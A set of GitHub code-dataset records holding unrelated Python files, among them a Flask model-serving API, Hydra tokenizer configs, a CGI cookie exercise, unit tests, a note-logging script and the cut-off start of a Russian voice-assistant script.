设置横轴和纵轴大小相等,这样饼才是圆的\nplt.legend()\nplt.show()\n","repo_name":"yzwgithub/TeachPython","sub_path":"AI/AI基础/class_23/class_23_01.py","file_name":"class_23_01.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"72613775528","text":"import logging\nimport json\n\nimport numpy as np\nfrom PIL import Image\nfrom flask import Flask, request, abort, send_from_directory\nfrom flask_cors import CORS\nfrom flask_socketio import SocketIO\n\nfrom celery_queue import app, redis_instance\nimport config\nfrom tasks import predict_vgg16, predict_mobilenet, predict_review_sentiment, \\\n predict_deeplab, predict_inception, predict_ssd_inception\n\ni = app.control.inspect()\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__package__)\nlogging.getLogger('engineio').setLevel(logging.ERROR)\nlogging.getLogger('socketio').setLevel(logging.ERROR)\nlogging.getLogger('werkzeug').setLevel(logging.ERROR)\n\nflask_app = Flask(__name__)\nsocketio = SocketIO(flask_app)\nCORS(flask_app)\n\ndef handle_image(request):\n if 'file' not in request.files:\n abort(400, config.ERROR_NO_IMAGE)\n\n file = request.files['file']\n # if user does not select file, browser also\n # submit a empty part without filename\n if file.filename == '':\n abort(400, config.ERROR_NO_IMAGE)\n\n img = Image.open(file)\n img.thumbnail(config.MAX_SIZE, Image.ANTIALIAS)\n return np.array(img)[:, :, :3], request.form.get('sessionId')\n\n\ndef handle_text(request):\n if 'text' not in request.form:\n abort(400, config.ERROR_NO_TEXT)\n\n text = request.form['text']\n if len(text) < 1:\n abort(400, config.ERROR_NO_TEXT)\n\n return text, request.form.get('sessionId')\n\n\ndef broadcast_queue_status():\n # Broadcast queue status to all clients\n task_ids = redis_instance.lrange('task_queue', 0, -1)\n task_ids = [task.decode() for task in task_ids]\n tasks_json = json.dumps(task_ids)\n socketio.emit('queue_status', {'data': tasks_json}, broadcast=True)\n return tasks_json\n\n\n@flask_app.route('/notify_client', methods=['post'])\ndef notify_client_route():\n session_id = request.form.get('session_id')\n predictions = request.form.get('predictions')\n task_id = request.form.get('task_id')\n\n if session_id is not None:\n socketio.emit('finished_job', {'predictions': predictions, 'taskId': task_id}, room=session_id)\n\n broadcast_queue_status()\n return '200 OK'\n\n\n@flask_app.route('/status', methods=['get'])\ndef status_route():\n tasks_json = broadcast_queue_status()\n return tasks_json\n\n\n@flask_app.route('/vgg16', methods=['POST'])\ndef vgg_route():\n img, session_id = handle_image(request)\n job = predict_vgg16.delay(img, session_id)\n return json.dumps({'taskId': job.id})\n\n\n@flask_app.route('/mobilenet', methods=['POST'])\ndef mobilenet_route():\n img, session_id = handle_image(request)\n job = predict_mobilenet.delay(img, session_id)\n return json.dumps({'taskId': job.id})\n\n\n@flask_app.route('/inception', methods=['POST'])\ndef inception_route():\n img, session_id = handle_image(request)\n job = predict_inception.delay(img, session_id)\n return json.dumps({'taskId': job.id})\n\n\n@flask_app.route('/review-sentiment', methods=['POST'])\ndef review_sentiment_route():\n text, session_id = handle_text(request)\n job = predict_review_sentiment.delay(text, session_id)\n\n return json.dumps({'taskId': job.id})\n\n\n@flask_app.route('/deeplab', methods=['POST'])\ndef deeplab_route():\n img, session_id = handle_image(request)\n job = predict_deeplab.delay(img, session_id)\n return json.dumps({'taskId': job.id})\n\n\n@flask_app.route('/ssd-inception', methods=['POST'])\ndef faster_rcnn_route():\n img, session_id = handle_image(request)\n job = predict_ssd_inception.delay(img, session_id)\n return json.dumps({'taskId': job.id})\n\n\n@flask_app.route('/outputs/')\ndef serve_images(path):\n return send_from_directory('outputs', path)\n\nlogger.info('Web server starting')\nsocketio.run(flask_app, debug=False, host='0.0.0.0', port=8091)\n\n","repo_name":"EliotAndres/pretrained.ml","sub_path":"containers/tensorflow_models/serve.py","file_name":"serve.py","file_ext":"py","file_size_in_byte":3790,"program_lang":"python","lang":"en","doc_type":"code","stars":360,"dataset":"github-code","pt":"53"} +{"seq_id":"10787826639","text":"from dataclasses import field\n\nfrom hydra.core.config_store import ConfigStore\nfrom omegaconf import MISSING\nfrom pydantic.dataclasses import dataclass\n\n\n@dataclass\nclass NormalizerConfig:\n _target_: str = MISSING\n\n\n@dataclass\nclass BertNormalizerConfig(NormalizerConfig):\n _target_: str = \"tokenizers.normalizers.BertNormalizer\"\n clean_text: bool = True\n handle_chinese_chars: bool = True\n strip_accents: bool = True\n lowercase: bool = True\n\n\n@dataclass\nclass LowercaseNormalizerConfig(NormalizerConfig):\n _target_: str = \"tokenizers.normalizers.Lowercase\"\n\n\n@dataclass\nclass NFCNormalizerConfig(NormalizerConfig):\n _target_: str = \"tokenizers.normalizers.NFC\"\n\n\n@dataclass\nclass NFDNormalizerConfig(NormalizerConfig):\n _target_: str = \"tokenizers.normalizers.NFD\"\n\n\n@dataclass\nclass NFKCNormalizerConfig(NormalizerConfig):\n _target_: str = \"tokenizers.normalizers.NFKC\"\n\n\n@dataclass\nclass NFKDNormalizerConfig(NormalizerConfig):\n _target_: str = \"tokenizers.normalizers.NFKD\"\n\n\n@dataclass\nclass NmtNormalizerConfig(NormalizerConfig):\n _target_: str = \"tokenizers.normalizers.Nmt\"\n\n\n@dataclass\nclass ReplaceNormalizerConfig(NormalizerConfig):\n _target_: str = \"tokenizers.normalizers.Nmt\"\n pattern: str = MISSING\n content: str = MISSING\n\n\n@dataclass\nclass SequenceNormalizerConfig(NormalizerConfig):\n _target_: str = \"tokenizers.normalizers.Sequence\"\n normalizers: list[NormalizerConfig] = field(default_factory=lambda: [])\n _normalizers_dict: dict[str, NormalizerConfig] = field(default_factory=lambda: {})\n\n\n@dataclass\nclass StripNormalizerConfig(NormalizerConfig):\n _target_: str = \"tokenizers.normalizers.Strip\"\n left: bool = True\n right: bool = True\n\n\n@dataclass\nclass StripAccentsNormalizerConfig(NormalizerConfig):\n _target_: str = \"tokenizers.normalizers.StripAccents\"\n\n\ndef setup_config() -> None:\n cs = ConfigStore.instance()\n\n cs.store(\n group=\"tokenizer/normalizer\",\n name=\"bert_normalizer_schema\",\n node=BertNormalizerConfig,\n )\n\n cs.store(\n group=\"tokenizer/normalizer\",\n name=\"liwer_case_normalizer_schema\",\n node=LowercaseNormalizerConfig,\n )\n\n cs.store(\n group=\"tokenizer/normalizer\",\n name=\"lower_case_normalizer_schema\",\n node=LowercaseNormalizerConfig,\n )\n\n cs.store(\n group=\"tokenizer/normalizer\",\n name=\"nfc_normalizer_schema\",\n node=NFCNormalizerConfig,\n )\n\n cs.store(\n group=\"tokenizer/normalizer\",\n name=\"nfd_normalizer_schema\",\n node=NFDNormalizerConfig,\n )\n\n cs.store(\n group=\"tokenizer/normalizer\",\n name=\"nfkc_normalizer_schema\",\n node=NFKCNormalizerConfig,\n )\n\n cs.store(\n group=\"tokenizer/normalizer\",\n name=\"nfkd_normalizer_schema\",\n node=NFKDNormalizerConfig,\n )\n\n cs.store(\n group=\"tokenizer/normalizer\",\n name=\"nmt_normalizer_schema\",\n node=NmtNormalizerConfig,\n )\n\n cs.store(\n group=\"tokenizer/normalizer\",\n name=\"replace_normalizer_schema\",\n node=ReplaceNormalizerConfig,\n )\n\n cs.store(\n group=\"tokenizer/normalizer\",\n name=\"sequence_normalizer_schema\",\n node=SequenceNormalizerConfig,\n )\n\n cs.store(\n group=\"tokenizer/normalizer\",\n name=\"strip_normalizer_schema\",\n node=StripNormalizerConfig,\n )\n\n cs.store(\n group=\"tokenizer/normalizer\",\n name=\"strip_accent_normalizer_schema\",\n node=StripAccentsNormalizerConfig,\n )\n","repo_name":"emkademy/cybulde-data-preparation","sub_path":"cybulde/config_schemas/tokenization/normalizer_schema.py","file_name":"normalizer_schema.py","file_ext":"py","file_size_in_byte":3550,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"18528710516","text":"#!C:\\Users\\zx22student3208\\AppData\\Local\\Programs\\Python\\Python311\\python.exe\n\n#trabajar con cookies: Il tratar la informacion que va en la cookie\n# los casos son! # el cliente NO me envia cookies -> crear cookie\n# el cliente me envia cookies pero no esta la que busco -> crear cookie # el cliente me envia cookies Y esta la que busco -> Teer cookie y modificar\nimport http.cookies, os\nfrom urllib.parse import urlparse, parse_qs\nru = os. environ. get(\"REQUEST_URI\")\nparametros = urlparse(ru)\nparam = parse_qs(parametros[4])\n\ntexto = param[\"texto\"][0]\n\nif texto.startswith(\"ABC\"): \n print(\"Content-Type: text/html\") \n cookie = http.cookies.SimpleCookie()\n\n if os.environ.get(\"HTTP_COOKIE\") == None: \n cookie[\"empiezaABC\"] = 1 \n cookie[\"empiezaABC\"] [\"expires\"] = \"Wed, 11 Oct 2024 07: 28:00 GMT\" \n print (cookie[\"empiezaABC\"])\n print()\n else:\n cookie. load(os. environ.get(\"HTTP_COOKIE\") ) \n if \"empiezaABC\" not in cookie: \n cookie[\"empiezaABC\"] = texto \n cookie[\"empiezaABC\"][\"expires\"] = \"Wed, 11 Oct 2024 07:28:00 GMT\" \n print(cookie)\n print()\n else:\n cookie[\"empiezaABC\"] = cookie[\"empiezaABC\"] + \" \" + texto \n cookie[\"empiezaABC\"][\"expires\"] = \"Wed, 11 Oct 2024 07: 28:00 GMT\" \n print(cookie)\n print()\n","repo_name":"AaronCordero-VDM/Practicas-SERVIDOR","sub_path":"Examen1ªEv/Ejercicio4/ej4_separaABC.py","file_name":"ej4_separaABC.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"23046818377","text":"import unittest\n\nimport sys\n\nfrom test_inputs.sources import *\n\nsys.path.insert(0, \"../../../engine/set/imagestar/\")\nfrom imagestar import *\n\nsys.path.insert(0, \"../../../tests/test_utils/\")\nfrom utils import *\n\nimport numpy as np\nimport mat73\n\nclass TestImageStarEvaluate(unittest.TestCase):\n \"\"\"\n Tests ImageStar evaluation\n \"\"\"\n\n def test_evaluation(self):\n \"\"\"\n Tests evaluation using predicate initialization\n \n eval_input : int -> number of images\n \n V -> Basis matrix\n C -> Predicate matrix\n d -> Predicate vector\n predicate_lb -> predicate lower bound\n predicate_ub -> predicate upper bound\n \"\"\"\n \n test_eval_input = self.read_csv_data(sources[EVALUATION_INIT][EVAL_INPUT_ID])\n test_eval_output = self.read_csv_data(sources[EVALUATION_INIT][EVAL_OUTPUT_ID])\n \n test_V = np.reshape(read_csv_data(sources[CONSTRUCTOR_PREDICATE_BOUNDARIES_INIT][V_ID]), (28,28,1,785))\n test_C = np.reshape(read_csv_data(sources[CONSTRUCTOR_PREDICATE_BOUNDARIES_INIT][C_ID]), (1, 784))\n test_d = read_csv_data(sources[CONSTRUCTOR_PREDICATE_BOUNDARIES_INIT][D_ID])\n test_predicate_lb = read_csv_data(sources[CONSTRUCTOR_PREDICATE_BOUNDARIES_INIT][PREDICATE_LB_ID])\n test_predicate_ub = read_csv_data(sources[CONSTRUCTOR_PREDICATE_BOUNDARIES_INIT][PREDICATE_UB_ID])\n \n test_star = ImageStar(\n test_V, test_C, test_d, test_predicate_lb, test_predicate_ub\n )\n \n try:\n test_result = test_star.evaluate(test_eval_input)\n except Exception as ex:\n completion_flag = False\n process_exception(ex)\n \n self.assertEqual(test_result.all(), test_eval_output.all())\n\n########################## UTILS ##########################\n def read_csv_data(self, path): \n return np.array(list(mat73.loadmat(path).values())[0])\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"V2A2/StarV_temp","sub_path":"tests/set/image_star/test_ImageStar_evaluate.py","file_name":"test_ImageStar_evaluate.py","file_ext":"py","file_size_in_byte":2080,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"37811165938","text":"from _collections import defaultdict\nclass NetGO:\n def __init__(self, g2gFile, alignFiles):\n self.pC = defaultdict(dict)\n self.CA = defaultdict(list)\n self.GOp = defaultdict(dict)\n self.pGO = defaultdict(dict)\n self.DRACONIAN = True\n self.get_pGO_GOp(g2gFile)\n for alignFile in alignFiles:\n self.get_pC_CA(alignFile)\n def SetIntersect(self, T1, T2):\n '''\n Takes pGO[protein], so a dict of GO terms, 1 meaning the protein\n has been annotated.\n Returns a dict of GO terms as well.\n '''\n out = {}\n if T1.size()>T2.size():\n for g in T2:\n if g in T1:\n out[g]=1\n if T1.size()<=T2.size():\n for g in T1:\n if g in T2:\n out[g]=1\n return out\n \n def K_g(self, g):\n '''\n Takes a GO term as a string, returns K(g) as int\n '''\n if(g in self.GOp):\n return len(self.GOp[g])\n else:\n return 0\n def K_gset(self, T):\n '''\n Takes pGO[p], a dict of GO terms with the names as keys, returns K(T)\n '''\n out=0\n for g in T:\n out+=self.K_g(g)\n return out\n def K_p(self, p):\n '''\n Takes a protein name as a string, returns K(p)\n '''\n if p in self.pGO:\n return self.k_gset(self.pGO[p])\n else:\n return 0\n def K_A2(self, A):\n '''\n Takes a pairwise alignment in the format A[u]=v, where u and v are pairs of proteins.\n Returns K(A)\n '''\n out = 0\n for u in A:\n if u in self.pGO:\n v = A[u]\n if v in self.pGO:\n out+=self.K_gset(self.SetIntersect(self.pGO[u], self.pGO[v]))\n return out\n def K_AC(self, C):\n '''\n C is a dict of clusters in the format {cl:\n '''\n out = 0\n for cl in C:\n #K_C is the K(C) value for each cluster cl in C\n K_C = 0\n #M is a dict of proteins of the following format: {protein:number of times occurring in cl...}\n #T is a dict of GO terms of the following format: {GO term:number of times occurring in cl... }\n #both are across cluster cl\n M, T = defaultdict(int), defaultdict(int)\n numClusterFields=len(C[cl])\n #only calculate K_C if cluster cl has more than one protein\n if numClusterFields>1:\n u=C[cl][0]\n #if the first protein, u, is not a placeholder, then add it to M\n if u!=\"_\" and u!=\"NA\":\n M[u]+=1\n #then, for each GO term annotating protein u, add it to T\n for g in self.pGO[u]:\n T[g]+=1\n #Now, we iterate over all proteins in cluster cl (skipping the first one, which we already processed). Add them to M.\n for i in range(1, numClusterFields):\n u=C[cl][i]\n if u==\"_\" or u==\"NA\":\n continue\n M[u]+=1\n #If we are in draconian mode:\n #Check that, for each protein u in M, each GO term g in T annotates u.\n #If the Go term g does not annotate any one of the proteins, then remove it from T.\n if self.DRACONIAN:\n for g in T:\n if g not in self.pGO[u]:\n T.pop(g)\n #If we are not in draconian mode:\n #Increment g's entry in T by one.\n else:\n for g in T:\n self.T[g]+=1\n #If cluster cl has any annotations, and either more than one protein, or one protein that occurs more than once...\n if len(T)>0 and (len(M)>1 or (len(M)==1 and M[u]>1)):\n if self.DRACONIAN:\n #If we are in draconian mode, just add K_gset(T)\n K_C+=self.K_gset(T)\n else:\n #If we are not in draconian mode, weed out any GO terms that annotate 1 or 0 proteins.\n for g in T:\n if T[g]>1:\n K_C+=T[g]*self.K_g(g)/numClusterFields\n out+=K_C\n return out\n def sim_A2(self, A):\n return self.K_A2(A/len(self.GOp))\n def get_pC_CA(self, alignFile):\n lineCount = 0\n for cluster in alignFile:\n lineCount+=1\n for protein in cluster.split(\"\\t\"):\n #set pC\n if lineCount in self.pC[protein]:\n self.pC[protein][lineCount]+=1\n else:\n self.pC[protein][lineCount]=1\n #set CA\n self.CA[lineCount].append(protein)\n def get_pGO_GOp(self, g2gFile):\n for line in g2gFile:\n protein, GOterm = line.split(\"\\t\")[1:3]\n self.pGO[protein][GOterm] = 1\n if protein not in self.GOp[GOterm]:\n self.GOp[GOterm][protein]=1\n else:\n self.GOp[GOterm][protein]+=1\n\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n ","repo_name":"alexleeuci/various","sub_path":"NetGO.py","file_name":"NetGO.py","file_ext":"py","file_size_in_byte":5361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70866207529","text":"#!/usr/bin/env python3\n\n\"\"\" Helper functions for non-blocking operation of pipes. \"\"\"\n\nimport os\nimport subprocess\nimport sys\n\nif sys.platform == \"win32\":\n # Posted to stackoverflow.com by anatoly techtonik, Dec/29/2015\n\n from ctypes import windll, byref, wintypes, GetLastError, WinError, POINTER\n from ctypes.wintypes import HANDLE, DWORD, BOOL\n # pylint tries to check this code even when run on POSIX platform\n # pylint: disable=import-error\n import msvcrt\n\n\n LPDWORD = POINTER(DWORD)\n PIPE_NOWAIT = wintypes.DWORD(0x00000001)\n ERROR_NO_DATA = 232\n\n\n def subprocess_creationflags():\n \"\"\"\n Returns additional platform-specific flags needed to pass to subprocess\n creation to suppress opening of a \"console window\".\n \"\"\"\n return subprocess.CREATE_NO_WINDOW\n\n\n def set_nonblocking(pipe):\n \"\"\"\n Configure the given pipe handle to be non-blocking when reading from\n it, equivalently to O_NONBLOCK on POSIX platform.\n \"\"\"\n set_named_pipe_handle_state = windll.kernel32.set_named_pipe_handle_state\n set_named_pipe_handle_state.argtypes = [HANDLE, LPDWORD, LPDWORD, LPDWORD]\n set_named_pipe_handle_state.restype = BOOL\n\n handle = msvcrt.get_osfhandle(pipe.fileno())\n\n res = windll.kernel32.set_named_pipe_handle_state(handle, byref(PIPE_NOWAIT), None, None)\n if res == 0:\n raise OSError(GetLastError(), WinError())\n\n\n def read_nonblocking(pipe, length):\n \"\"\"\n Read from a non-blocking pipe. If there is no data return None. Any\n other errors raise exception OSError.\n \"\"\"\n try:\n return os.read(pipe.fileno(), length)\n except OSError:\n if GetLastError() != ERROR_NO_DATA:\n raise OSError(GetLastError(), WinError())\n return None\n\n\nelse:\n import fcntl\n\n\n def subprocess_creationflags():\n \"\"\"\n Returns additional platform-specific flags needed to pass to subprocess\n creation. On POSIX platforms this function is not needed and returns 0.\n \"\"\"\n return 0\n\n\n def set_nonblocking(pipe):\n \"\"\"\n Configure the given file descriptor to be non-blocking for read/write.\n \"\"\"\n flags = fcntl.fcntl(pipe, fcntl.F_GETFL)\n fcntl.fcntl(pipe, fcntl.F_SETFL, flags | os.O_NONBLOCK)\n\n\n def read_nonblocking(pipe, length):\n \"\"\"\n Read from a non-blocking pipe. Returns an empty string if there is no data.\n \"\"\"\n #try:\n # return os.read(pipe.fileno(), length)\n #except BlockingIOError:\n # data = None\n return pipe.read(length)\n","repo_name":"tomzox/gtest_gui","sub_path":"gtest_gui/fcntl.py","file_name":"fcntl.py","file_ext":"py","file_size_in_byte":2684,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"5606448274","text":"from django.conf.urls import url\n\nfrom raffle.views import (\n RaffleListCreateAPIView, RaffleRetrieveUpdateDestroyAPIView, ExecuteRaffleAPIView,\n RaffleApplicationAPIView)\n\nurlpatterns = [\n url(r'^$', RaffleListCreateAPIView.as_view(), name='raffles'),\n url(r'^(?P[0-9]+)/$', RaffleRetrieveUpdateDestroyAPIView.as_view(), name='raffle_details'),\n url(r'^(?P[0-9]+)/execute', ExecuteRaffleAPIView.as_view(),\n name='raffle_execute'),\n url(r'^(?P[0-9]+)/apply', RaffleApplicationAPIView.as_view(),\n name='raffle_apply'),\n\n]","repo_name":"NayaraCaetano/lottery-api","sub_path":"raffle/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"6198447271","text":"from datetime import datetime\r\nfrom textwrap import fill\r\nfrom os import system, SEEK_END, SEEK_SET\r\nfrom hashlib import blake2b\r\nloop = True\r\nfl = input(\"Note filename?\\n>>> \")\r\nnotelog = open(fl+\".txt\", \"a+\")\r\nHTML_nl = open(fl+\".HTML\", \"a+\")\r\nif HTML_nl.readline()!=\"\\n\":\r\n HTML_nl.write(\"\\n\")\r\nelse:\r\n # Move the pointer (similar to a cursor in a text editor) to the end of the file\r\n HTML_nl.seek(0, SEEK_END)\r\n\r\n # This code means the following code skips the very last character in the file -\r\n # i.e. in the case the last line is null we delete the last line\r\n # and the penultimate one\r\n pos = HTML_nl.tell() - 1\r\n\r\n # Read each character in the file one at a time from the penultimate\r\n # character going backwards, searching for a newline character\r\n # If we find a new line, exit the search\r\n while pos > 0 and HTML_nl.read(1) != \"\\n\":\r\n pos -= 1\r\n HTML_nl.seek(pos, SEEK_SET)\r\n\r\n # So long as we're not at the start of the file, delete all the characters ahead\r\n # of this position\r\n if pos > 0:\r\n HTML_nl.seek(pos, SEEK_SET)\r\n HTML_nl.truncate()\r\nnote_number=0\r\nlineline = \"\\n\"+ \"-\"*80 +\"\\n\"\r\npoundline = \"\\n\"+\"#\"*80 +\"\\n\"\r\ntildeline = \"\\n\"+\"~\"*80 +\"\\n\"\r\nHTML_lineline = \"

\"\r\nnotelog.write(\"#\"*80+\"\\n\"+\"::-BEGIN SESSION-::\\n\")\r\nHTML_nl.write(\"

NOTELOG SESSION

\")\r\nwhile loop == True:\r\n\tnote_number+=1\r\n\t_who = input(\"\\nWho?\\n>>> \") +\"\\t\"\r\n\t_when = input(\"\\nWhen? (leave blank for current time)\\n>>> \")\r\n\tif _when == \"\":\r\n\t\t_when = str(datetime.now())\r\n\t_when = _when+\"\\n\"\r\n\t_contact_info = input(\"\\nContact Information?\\n>>> \")+\"\\n\"\r\n\t_what = \">>> \"+input(\"\\nWhat?\\n>>> \")\r\n\t_what = fill(_what, subsequent_indent=\"\\t\")\r\n\tnote_text = \"\".join([\"Note #\",\r\n str(note_number),\r\n \"\\n\"+\"TimeStamp::\",\r\n \"[\"+str(datetime.now())+\"]\",\r\n lineline,\r\n _who,\r\n _when,\r\n _contact_info,\r\n _what,\r\n \"\\n\\n\"\r\n ])\r\n\tHTML_note_text = \"\".join([\"

Note #\",\r\n str(note_number),\r\n \"

\"+\"TimeStamp::\",\r\n \"[\"+str(datetime.now())+\"]\",\r\n HTML_lineline,\r\n \"

\"+_who +\"

\",\r\n _when,\r\n \"
\",\r\n _contact_info,\r\n \"

\",\r\n _what,\r\n \"

\"\r\n ])\r\n\tnotelog.write(note_text)\r\n\tHTML_nl.write(HTML_note_text)\r\n\thashstamp = blake2b()\r\n\thashstamp.update(bytes(note_text, 'utf-8'))\r\n\tnotelog.write(\"HashStamp::[\"+hashstamp.hexdigest()+\"]\"+tildeline)\r\n\tHTML_nl.write(\"HashStamp::[\"+hashstamp.hexdigest()+\"]\"+HTML_lineline)\r\n\thashstamp=None\r\n\tstop_condition = input(\"\\nAnother Note? [Y/n]\\n>>> \")\r\n\tsystem('cls||clear')\r\n\tif stop_condition == 'n' or stop_condition == 'N':\r\n\t\tloop = False\r\nsession_hashstamp = blake2b()\r\nsession_hashstamp.update(bytes(notelog.read(), 'utf-8')) #This ensures the WHOLE of the notelog, not just a single session is verified as integral by hash \r\nnotelog.write(\"||-END SESSION-||\"+\"\\nSESSION HASHSTAMP::[\"+session_hashstamp.hexdigest()+\"]\" + poundline+\"\\n\")\r\nHTML_nl.write(\"

END SESSION

\"+\"\\nSESSION HASHSTAMP::[\"+session_hashstamp.hexdigest()+\"]\" + \"\\n

\")\r\nnotelog.close()\r\nHTML_nl.close()\r\n","repo_name":"augustrm/maxnote","sub_path":"maxnote_HTML.py","file_name":"maxnote_HTML.py","file_ext":"py","file_size_in_byte":3775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31646748418","text":"# oj t -c \"python main.py\" -d \"./tests/\" \n\n# a,b = map(int,input().split())\n# a = list(map(int,input().split()))\n# a = [list(map(int,input().split())) for _ in range(n)]\n\n# import sys\n# read = sys.stdin.buffer.read\n# readline = sys.stdin.buffer.readline\n# readlines = sys.stdin.buffer.readlines\n\n# 検討?分 実装分 バグとり分\n\n# import sys\n# import os\n# f = open('../../../input.txt', 'r')\n# sys.stdin = f\n\n# 解説ACする\n\nn,k = map(int,input().split())\na = list(map(int,input().split()))\nmod = 10**9 + 7\n\n## nCkのmodを求める関数\n# テーブルを作る(前処理)\nmax_n = 10**4\nfac, finv, inv = [0]*max_n, [0]*max_n, [0]*max_n\n\ndef comInit(max_n):\n fac[0] = fac[1] = 1\n finv[0] = finv[1] = 1\n inv[1] = 1\n\n for i in range(2,max_n):\n fac[i] = fac[i-1]* i% mod\n inv[i] = mod - inv[mod%i] * (mod // i) % mod\n finv[i] = finv[i-1] * inv[i] % mod\n\ncomInit(max_n)\n\n# 二項係数の計算\ndef com(n,k):\n if(n < k):\n return 0\n if( (n<0) | (k < 0)):\n return 0\n return fac[n] * (finv[k] * finv[n-k] % mod) % mod\n\ndp = [0] * (n+1)\ndp[0] = fac[n]\nfor i in range(k):\n dp2 = [0] * (n+1)\n for j in range(n+1):\n for x in range(a[i]+1):\n if j + x > n:\n break\n dp2[j+x] += (dp[j] * com(n-x, a[i]-x) % mod) * finv[x]\n dp2[j+x] %= mod\n dp,dp2 = dp2,dp\n\nans = dp[-1]\nprint(ans)\n\n\n","repo_name":"komajun365/competitive_programming","sub_path":"others/dwacon6th-prelims/c/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72295721129","text":"import numpy as np\nimport os\nimport pandas as pd\nfrom sklearn import preprocessing\nfrom tqdm import tqdm \nimport time\nimport sys\nimport torch\n\nclass PreProcesser:\n \n @staticmethod\n def no_expert_knowledge(data_io):\n df = data_io.dataframe_raw\n prune_cols = []\n for col in data_io.columns_raw:\n if len(col) >= 5:\n if col[-5:-2] == \"(t-\" and col[-1] == \")\" and \"1\" <= col[-2] <= \"5\":\n prune_cols.append(col)\n for col in prune_cols:\n df = df.drop(col, axis=1)\n return df\n\n @staticmethod\n def transfer_to_sequence(x_data, y_data, device):\n size = len(x_data)\n sequence = []\n for i in range(size):\n sequence.append(np.array([x_data[i], y_data[i]]))\n return torch.FloatTensor(np.array(sequence)).to(device)\n\nif __name__ == \"__main__\":\n try:\n from data_utils.get_input import Data_IO\n except:\n from get_input import Data_IO\n data_path = \"./data/NSC_Si_Content_Timedelay_Data_CN.xlsx\"\n data_io = Data_IO(data_path=data_path)\n pre_process = PreProcesser()\n pre_process.no_expert_knowledge(data_io)\n","repo_name":"lebronlihd/key-indicator_prediction","sub_path":"data_utils/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"29514649039","text":"from typing import List\n\ndef twoSum(nums: List[int], target: int) -> List[int]:\n\n sortednums = []\n for i, value in enumerate(nums):\n sortednums.append([value, i]) \n sortednums = sorted(sortednums)\n left = 0 \n right = len(nums) -1\n while left < right:\n if sortednums[left][0] + sortednums[right][0] > target:\n right -= 1\n elif sortednums[left][0] + sortednums[right][0] < target:\n left += 1\n else:\n return [sortednums[left][1], sortednums[right][1]]\n \n\nnums = [2,7,11,15]\ntarget = 9\nprint(twoSum(nums=nums, target=target))\n\n","repo_name":"xianergoo/PythonTab","sub_path":"leetcode/two_sum.py","file_name":"two_sum.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39513309099","text":"# Imported before anything else to overwrite env vars!\n\nimport os\nimport sys\n\n\"\"\"\nThere are several options:\n1) running in pycharm\n second argument is \"test\"\n2) running pytest at the CLI\n first argument is the path to pytest and ends pytest\n3) running pytest using the script at /bin/tests\n first argument is the path to pytest and ends pytest\n4) running in some other context (e.g. in prod)\n first argument does not end pytest\n second argument is not test\n\nArguments to the application will be slightly different in each case\n\nSo, in order to set test variables we need to look in slightly different places\n\nThe /bin/tests file also runs mypy to do type checking. This needs DEBUG=1 set too\n\nRunning pytest directly does not always load django settings but sometimes needs these environment variables.\nWe use pytest-env to let us set environment variables from the closest pytest.ini\n\nWe can't rely only on pytest.ini as some tests evaluate this file before its environment variables have been read\n\"\"\"\nrunner = sys.argv[0] if len(sys.argv) >= 1 else None\n\ncmd = None\nif runner:\n cmd = sys.argv[1] if len(sys.argv) >= 2 else None\n\n if cmd == \"test\" or runner.endswith(\"pytest\") or runner.endswith(\"mypy\"):\n print(\"Running in test mode. Setting DEBUG and TEST environment variables.\")\n os.environ[\"DEBUG\"] = \"1\"\n os.environ[\"TEST\"] = \"1\"\n","repo_name":"PostHog/posthog","sub_path":"posthog/settings/overrides.py","file_name":"overrides.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","stars":14422,"dataset":"github-code","pt":"53"} +{"seq_id":"31492657107","text":"from copyreg import constructor\r\nimport apiai, json, re\r\nimport pyttsx3\r\nimport speech_recognition as sr\r\nimport webbrowser\r\nimport subprocess\r\nimport time\r\nimport psutil\r\nimport pyautogui as pag\r\nimport eel\r\nfrom threading import Thread\r\nimport os\r\nimport random\r\nimport pygame\r\n\r\n#функция для удаление файлов, в дальнейшем планируется \r\n#использовать подход записи файлов для голосовых сообщений с телефона\r\n@eel.expose\r\ndef delete_file(file):\r\n if os.path.isfile(file):\r\n os.remove(file)\r\n print(\"success\")\r\n else: print(\"File doesn't exists!\")\r\n\r\n#добавление проигроваемых звуков, проигрывание вступления \r\npygame.init()\r\nsongLodaing = pygame.mixer.Sound('output/loading.mp3')\r\nsongExecutes = pygame.mixer.Sound('output/executes.mp3')\r\nsongDisappearance = pygame.mixer.Sound('output/disappearance.mp3')\r\nsongAppearance = pygame.mixer.Sound('output/appearance.mp3')\r\npygame.mixer.music.set_volume(2)\r\nclock = pygame.time.Clock()\r\nsongLodaing.play()\r\n\r\n#инициализация графики \r\neel.init(\"web\")\r\n\r\n#Инициализация синтезатора голоса \r\ntts = pyttsx3.init()\r\nrate = tts.getProperty('rate')\r\ntts.setProperty('rate', rate-40)\r\nvolume = tts.getProperty('volume')\r\ntts.setProperty('volume', volume+0.9)\r\nvoices = 